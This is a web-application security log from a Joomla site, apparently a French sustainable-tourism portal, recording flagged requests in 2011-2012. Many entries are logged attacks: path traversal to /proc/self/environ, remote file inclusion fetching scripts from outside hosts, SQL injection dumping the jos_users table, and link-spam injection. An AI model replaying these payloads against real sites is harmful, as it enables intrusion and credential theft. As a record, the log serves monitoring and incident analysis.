#Version: 1.0 #Date: 2011-10-24 02:36:04 #Fields: date time level c-ip status comment #Software: Joomla! 1.5.23 Stable [ senu takaa ama baji ] 04-March-2011 18:00 GMT 2011-10-24 02:36:04 USER_AGENT: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 IP: 213.251.186.63 USER: visitor REQUEST: page=../../../../../../../../../../../../..//proc/self/environ\000 PAR: /?page=../../../../../../../../../../../../..//proc/self/environ%0000 2011-10-24 02:44:56 USER_AGENT: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 IP: 213.251.186.63 USER: visitor REQUEST: page=http://p-mp.ru/71710deea5bb1d98efa21b7d6ae1b90e/idxml.txt? PAR: /?page=http://p-mp.ru/71710deea5bb1d98efa21b7d6ae1b90e/idxml.txt? 2011-10-24 02:44:56 USER_AGENT: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 IP: 213.251.186.63 USER: visitor REQUEST: page=http://w.duszki.pl/classifieds/pictures/listings/blues.txt??? PAR: /?page=http://w.duszki.pl/classifieds/pictures/listings/blues.txt??? 2011-10-24 02:44:58 USER_AGENT: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 IP: 213.251.186.63 USER: visitor REQUEST: page=http://momtaz.org/files/alnyet.txt?? PAR: /?page=http://momtaz.org/files/alnyet.txt?? 2011-10-27 10:05:44 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 IP: 89.156.164.166 USER: visitor REQUEST: editor_body=&lt;div style=\&quot;font-size: 100%; font-family: Tahoma, Geneva, Kalimati, sans-ser PAR: editor_body 2011-11-30 23:28:05 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:8.0) Gecko/20100101 Firefox/8.0 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p&gt;&lt;span style=\&quot;font-size: 12pt;\&quot;&gt;&lt;strong&gt;O&lt;/strong&gt;&lt;/ PAR: t33 2011-12-06 18:19:25 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0 IP: 81.56.56.162 USER: visitor REQUEST: editor_body=&lt;div style=\&quot;background-color: #b6b6b6;\&quot;&gt; &lt;div style=\&quot;font PAR: editor_body 2011-12-09 01:14:30 USER_AGENT: Mozilla/5.2 (Windows; U; Windows NT 5.2; en-EN) Gecko/20080919 Firefox/3.5.6 IP: 173.212.209.244 USER: visitor REQUEST: option=com_simpleshop PAR: /index.php?option=com_simpleshop&Itemid=41&cmd=section§ion=-000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F000%2C111%2C222%2C0x33633273366962%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- 2011-12-09 20:19:34 USER_AGENT: Mozilla/5.2 (Windows; U; Windows NT 5.2; en-EN) Gecko/20080919 Firefox/3.5.6 IP: 64.191.99.110 USER: visitor REQUEST: option=com_simpleshop PAR: /index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F000%2C111%2C222%2C0x33633273366962%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- 2011-12-09 22:48:14 USER_AGENT: Mozilla/5.2 (Windows; U; Windows NT 5.2; en-EN) Gecko/20080919 Firefox/3.5.6 IP: 173.212.209.228 USER: visitor REQUEST: option=com_ponygallery PAR: /index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=union%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C0x33633273366962%2C5%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- 2011-12-21 23:37:37 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:8.0) Gecko/20100101 Firefox/8.0 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p&gt;&lt;span style=\&quot;font-size: 14pt;\&quot;&gt;&lt;strong&gt;L&lt;/strong&gt;&lt;/ PAR: t33 2011-12-21 23:38:18 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:8.0) Gecko/20100101 Firefox/8.0 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p&gt;&lt;span style=\&quot;font-size: 14pt;\&quot;&gt;&lt;strong&gt;L&lt;/strong&gt;&lt;/ PAR: t33 2011-12-21 23:38:45 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:8.0) Gecko/20100101 Firefox/8.0 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p&gt;&lt;span style=\&quot;font-size: 14pt;\&quot;&gt;&lt;strong&gt;L&lt;/strong&gt;&lt;/ PAR: t33 2011-12-21 23:40:13 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:8.0) Gecko/20100101 Firefox/8.0 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p&gt;&lt;span style=\&quot;font-size: 14pt;\&quot;&gt;&lt;strong&gt;L&lt;/strong&gt;&lt;/ PAR: t33 2012-01-09 13:57:11 USER_AGENT: Avant Browser (http://www.avantbrowser.com) IP: 79.169.196.207 USER: visitor REQUEST: feed_id=5 PAR: /component/ninjarsssyndicator/?feed_id=5&format=raw/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../..//proc/self/environ%00 2012-01-09 13:57:13 USER_AGENT: Avant Browser (http://www.avantbrowser.com) IP: 79.169.196.207 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../..//proc/self/environ%00 2012-01-09 13:57:14 USER_AGENT: Avant Browser (http://www.avantbrowser.com) IP: 79.169.196.207 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../..//proc/self/environ%00 2012-01-10 09:32:43 USER_AGENT: RockMeltEmbedService IP: 184.72.46.152 USER: visitor REQUEST: option=com_content PAR: http://www.tourisme-durable.org/index.php?option=com_content&view=article&id=1020%3Atransport-des-voyageurs-a-mobilite-reduite-publication-dun-referentiel-de-bonnes-pratiques-&catid=98%3Atransport-climat&Itemid=712 2012-01-12 07:53:07 USER_AGENT: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 IP: 194.105.70.69 USER: visitor REQUEST: feed_id=5 PAR: /component/ninjarsssyndicator/?feed_id=5&format=raw/.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-12 07:53:09 USER_AGENT: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 IP: 194.105.70.69 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-12 07:53:10 USER_AGENT: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 IP: 194.105.70.69 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator/.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-12 08:04:25 USER_AGENT: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 IP: 194.105.70.69 USER: visitor REQUEST: feed_id=5 PAR: /component/ninjarsssyndicator/?feed_id=5&format=raw/.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-12 08:04:27 USER_AGENT: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 IP: 194.105.70.69 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-12 08:04:29 USER_AGENT: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 IP: 194.105.70.69 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator/.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-19 05:05:50 USER_AGENT: Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm) IP: 46.4.119.247 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-19 05:05:51 USER_AGENT: Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm) IP: 46.4.119.247 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-19 05:05:51 USER_AGENT: Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm) IP: 46.4.119.247 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-24 16:39:00 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-size: 14pt;\&quo PAR: t33 2012-01-24 16:39:54 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-size: 14pt;\&quo PAR: t33 2012-01-24 16:41:30 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-size: 14pt;\&quo PAR: t33 2012-01-24 16:41:51 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-size: 14pt;\&quo PAR: t33 2012-01-24 16:42:48 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-size: 14pt;\&quo PAR: t33 2012-01-24 16:43:08 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-size: 14pt;\&quo PAR: t33 2012-01-24 16:49:12 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-size: 14pt;\&quo PAR: t33 2012-01-24 16:51:03 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-size: 14pt;\&quo PAR: t33 2012-01-24 16:51:43 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;font-size: 14pt;\&quo PAR: t33 2012-01-26 12:30:14 USER_AGENT: IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html) IP: 83.169.21.204 USER: visitor REQUEST: feed_id=5 PAR: /component/ninjarsssyndicator/?feed_id=5&format=raw/////index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-26 12:30:15 USER_AGENT: IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html) IP: 83.169.21.204 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /////index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-26 12:30:15 USER_AGENT: IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html) IP: 83.169.21.204 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator/////index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-26 12:30:23 USER_AGENT: FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com) IP: 83.169.21.204 USER: visitor REQUEST: feed_id=5 PAR: /component/ninjarsssyndicator/?feed_id=5&format=raw/////index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-26 12:30:23 USER_AGENT: FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com) IP: 83.169.21.204 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /////index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-01-26 12:30:25 USER_AGENT: FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com) IP: 83.169.21.204 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator/////index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%0000 2012-02-03 19:09:25 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=boibuupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.lcwatutxud.com\&quot;&gt;mrmow PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=boibuupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.lcwatutxud.com%22%3Emrmowossjk%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.wfaypwlfjn.com%5Dibffzooarc%5B%2Furl%5D%2C+http%3A%2F%2Fwww.tccksprbat.com+mrmowossjk&submit_search=Recherche 2012-02-04 03:15:01 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.235 USER: visitor REQUEST: cp_text_search=oyfapupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.udsicljpwg.com\&quot;&gt;laarv PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=oyfapupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.udsicljpwg.com%22%3Elaarvhylna%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.vdrfycvpap.com%5Dxcpvsntiaf%5B%2Furl%5D%2C+http%3A%2F%2Fwww.jvmmazqzga.com+laarvhylna&submit_search=Recherche 2012-02-04 11:53:17 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=talxiupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.wksouezymk.com\&quot;&gt;vzmxl PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=talxiupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.wksouezymk.com%22%3Evzmxlslpcf%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.hsguknzkxt.com%5Donmnvggzly%5B%2Furl%5D%2C+http%3A%2F%2Fwww.tcfschxtsa.com+vzmxlslpcf&submit_search=Recherche 2012-02-04 20:44:29 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.235 USER: visitor REQUEST: cp_text_search=jrodwupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.minzeqbdkl.com\&quot;&gt;oygev PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=jrodwupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.minzeqbdkl.com%22%3Eoygevnuuop%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.vvzntmqojr.com%5Dubqvylpyim%5B%2Furl%5D%2C+http%3A%2F%2Fwww.zhbvezrtth.com+oygevnuuop&submit_search=Recherche 2012-02-04 21:51:49 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=imbewupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.krjkzabmkw.com\&quot;&gt;ulmcw PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=imbewupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.krjkzabmkw.com%22%3Eulmcwmhypn%3C%2Fa%3E+&submit_search=Recherche 2012-02-05 06:03:12 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.235 USER: visitor REQUEST: cp_text_search=lvzouupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.qfoeywdplg.com\&quot;&gt;otlqc PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=lvzouupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.qfoeywdplg.com%22%3Eotlqcntoyu%3C%2Fa%3E+&submit_search=Recherche 2012-02-14 18:00:40 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.234 USER: visitor REQUEST: cp_text_search=kqqzdupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.ookzyxfxir.com\&quot;&gt;opqik PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=kqqzdupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.ookzyxfxir.com%22%3Eopqikzmhtd%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.ntsnizfxbr.com%5Dnegjhnrfcs%5B%2Furl%5D%2C+http%3A%2F%2Fwww.pvlozprwds.com+opqikzmhtd&submit_search=Recherche 2012-02-15 02:52:35 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.234 USER: visitor REQUEST: cp_text_search=xunevupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.glkgwbancr.com\&quot;&gt;jzgor PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=xunevupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.glkgwbancr.com%22%3Ejzgorufpka%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.ylqpxtbzvq.com%5Dyxokowpfio%5B%2Furl%5D%2C+http%3A%2F%2Fwww.hssfpvzmdb.com+jzgorufpka&submit_search=Recherche 2012-02-15 13:39:45 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.234 USER: visitor REQUEST: cp_text_search=ghgdmupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.xloqyiavsv.com\&quot;&gt;xszzd PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=ghgdmupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.xloqyiavsv.com%22%3Exszzdvkjct%3C%2Fa%3E+&submit_search=Recherche 2012-02-15 22:42:33 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.234 USER: visitor REQUEST: cp_text_search=mxzequpvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.bqnkhdplbv.com\&quot;&gt;ddchm PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=mxzequpvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.bqnkhdplbv.com%22%3Eddchmmnmpy%3C%2Fa%3E+&submit_search=Recherche 2012-02-16 08:59:45 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.234 USER: visitor REQUEST: cp_text_search=jubeeupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.aoqfewfzji.com\&quot;&gt;gtmkq PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=jubeeupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.aoqfewfzji.com%22%3Egtmkqqpfun%3C%2Fa%3E+&submit_search=Recherche 2012-02-22 09:35:35 USER_AGENT: Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0 Iceweasel/8.0 IP: 69.163.176.83 USER: visitor REQUEST: option=com_content PAR: /index.php?option=com_content&view=article&id=1045:tourisme-durable-et-zones-humides&catid=101:nature-environnement&Itemid=736,%20http://www.tourisme-durable.org/index.php?option=com_content&view=article&id=1045:tourisme-durable-et-zones-humides&catid=101:nature-environnement&Itemid=736 2012-02-27 14:17:38 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 91.121.9.61 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component//index.php?option=com_ninjarsssyndicator&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 2012-02-27 14:17:38 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 91.121.9.61 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: //index.php?option=com_ninjarsssyndicator&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 2012-02-27 14:54:41 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 175.199.25.71 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component//index.php?option=com_ninjarsssyndicator&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 2012-02-27 14:54:43 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 175.199.25.71 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: //index.php?option=com_ninjarsssyndicator&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 2012-02-27 17:15:04 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.234 USER: visitor REQUEST: cp_text_search=uftfxupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.quocyqvbon.com\&quot;&gt;kntar PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=uftfxupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.quocyqvbon.com%22%3Ekntaroijsk%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.vwebcmxola.com%5Dgqmazrvfkm%5B%2Furl%5D%2C+http%3A%2F%2Fwww.qmnommpatv.com+kntaroijsk&submit_search=Recherche 2012-02-28 03:41:13 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.234 USER: visitor REQUEST: cp_text_search=akqevupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.uxjmfeoyxp.com\&quot;&gt;egyvj PAR: /actualite/hebergement-restauration/index.php?option=com_customproperties&view=show&task=show&Itemid=719&bind_to_section=1&cp_zone_geographique=france&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=akqevupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.uxjmfeoyxp.com%22%3Eegyvjhfvjg%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.riyxkgtgyi.com%5Dsrceadewis%5B%2Furl%5D%2C+http%3A%2F%2Fwww.goxxvxmrnv.com+egyvjhfvjg&submit_search=Recherche 2012-03-06 17:32:02 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:33:33 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:35:05 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:35:31 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:36:03 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:36:54 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:37:39 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:37:59 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;em&gt;&lt;strong&gt;Le Journal du Touri PAR: t33 2012-03-06 17:38:38 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: 